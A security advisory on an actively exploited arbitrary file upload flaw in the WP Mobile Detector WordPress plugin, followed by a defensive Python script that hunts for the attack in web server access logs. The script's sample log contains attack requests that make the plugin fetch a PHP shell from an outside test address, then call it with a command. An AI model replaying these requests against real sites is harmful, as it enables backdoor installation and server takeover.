Researchers at Sucuri said that attacks against WordPress sites running the plugin started on May 26.
Vulnerability details
Advisory: SB2016052901 - Arbitrary file upload in WP Mobile Detector
Vulnerable component: WP Mobile Detector
CVE-ID:
CVSSv3 score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C
CWE-ID: CWE-20 - Improper input validation
Description:
The vulnerability allows a remote attacker to upload arbitrary files to compromise the target system.
The weakness exists due to the failure to validate and sanitize input. A remote attacker can send a request to resize.php or timthumb.php inside the plugin directory with a URL pointing to an attacker-controlled file that contains PHP code; the script fetches that file and stores it on the server without checking its type.
Successful exploitation allows the attacker to upload malicious files (for example a PHP backdoor) and compromise the vulnerable system.
Note: the vulnerability was being actively exploited.
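The following Python script is an added example, not code from the plugin or from the advisory. It hunts for the exploitation pattern described above in web server access logs with two rules: a request to resize.php or timthumb.php whose query string carries an absolute URL to a non-image resource (the remote backdoor fetch), and a later request for a .php file under the plugin's cache directory (the dropped file being used). It assumes the default install path `/wp-content/plugins/wp-mobile-detector/`, that fetched files are written to a `cache/` directory under it, and that the remote URL travels in the query string; the advisory does not name the parameter, so every parameter is inspected rather than only `src`. The log lines are constructed sample data using RFC 5737 test addresses.

```python
"""Hunt for WP Mobile Detector arbitrary-file-upload activity in access logs.

Added example (not the plugin's or the advisory's code). Rules:
  remote_fetch    - resize.php/timthumb.php called with an absolute URL to a
                    non-image resource in any query parameter;
  cache_php_exec  - a .php file requested from the plugin's cache/ directory.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Scripts named in the advisory.
VULNERABLE_SCRIPTS = ("resize.php", "timthumb.php")
# Assumption: default plugin slug and wp-content location.
PLUGIN_PATH = "/wp-content/plugins/wp-mobile-detector/"
# Assumption: fetched files are written to cache/ under the plugin directory.
CACHE_PATH = PLUGIN_PATH + "cache/"

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".webp"}

# Apache/nginx "combined" log format; only the fields we use are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: lines 1-3 are attack traffic, lines 4-5 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [31/May/2016:08:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://198.51.100.9/x/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [31/May/2016:08:12:03 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.44 - - [31/May/2016:08:15:22 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http%3A%2F%2F198.51.100.9%2Fpayload HTTP/1.1" 200 512 "-" "curl/7.47.0"
198.51.100.23 - - [31/May/2016:09:01:10 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/2016/05/banner.jpg&w=320 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.23 - - [31/May/2016:09:01:11 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://cdn.example.net/hero.png&w=320 HTTP/1.1" 200 30000 "-" "Mozilla/5.0"
"""


def suspicious_values(query, strict=False):
    """Return query-string values that are absolute URLs to non-image resources.

    Every parameter is inspected, so the check does not depend on the exact
    parameter name the scripts read. With strict=True any absolute URL is
    returned, image or not (noisier, but catches a PHP payload renamed .gif).
    """
    hits = []
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            parts = urlsplit(value)
            if parts.scheme not in ("http", "https", "ftp") or not parts.netloc:
                continue  # local path, not a remote fetch
            name = parts.path.rsplit("/", 1)[-1]
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            if strict or ext not in IMAGE_EXTS:
                hits.append(value)
    return hits


def scan_log(lines, strict=False):
    """Return one finding dict per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        target = urlsplit(m.group("target"))
        path = target.path.lower()
        base = {
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "script": path.rsplit("/", 1)[-1],
        }
        if PLUGIN_PATH in path and path.endswith(VULNERABLE_SCRIPTS):
            for url in suspicious_values(target.query, strict):
                findings.append({**base, "rule": "remote_fetch", "remote": url})
        elif CACHE_PATH in path and path.endswith(".php"):
            findings.append({**base, "rule": "cache_php_exec", "remote": None})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']}  {f['ip']:<15} {f['rule']:<15} {f['script']}  {f['remote'] or ''}")
```

Run against the sample it reports the resize.php fetch of shell.php, the follow-up hit on cache/shell.php, and the timthumb.php fetch of an extension-less payload, while the two legitimate image resizes stay quiet. A cache_php_exec hit, or any .php file found on disk under the plugin's cache directory, should be treated as a confirmed compromise rather than an attempt.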
External links:
https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-d...
https://threatpost.com/wordpress-patches-zero-day-in-wp-mobile-detector-plugin/118458/
https://www.recoverwp.com/en/arbitrary-file-upload-vulnerability-in-wp-mobile-detector/
https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
http://news.softpedia.com/news/wordpress-sites-under-attack-from-new-zero-day-in-wp-mobile-detector-...
https://vulners.com/threatpost/WORDPRESS-PATCHES-ZERO-DAY-IN-WP-MOBILE-DETECTOR-PLUGIN/118458
http://www.spamfighter.com/News-20313-WordPress-Websites-Being-Assaulted-Through-Fresh-0-Day-within-...
http://www.builditdigital.com/blog/wp-mobile-detector-plugin-makes-over-10-000-wordpress-sites-vulne...
http://www.zdnet.com/article/over-10000-wordpress-sites-vulnerable-to-exploit/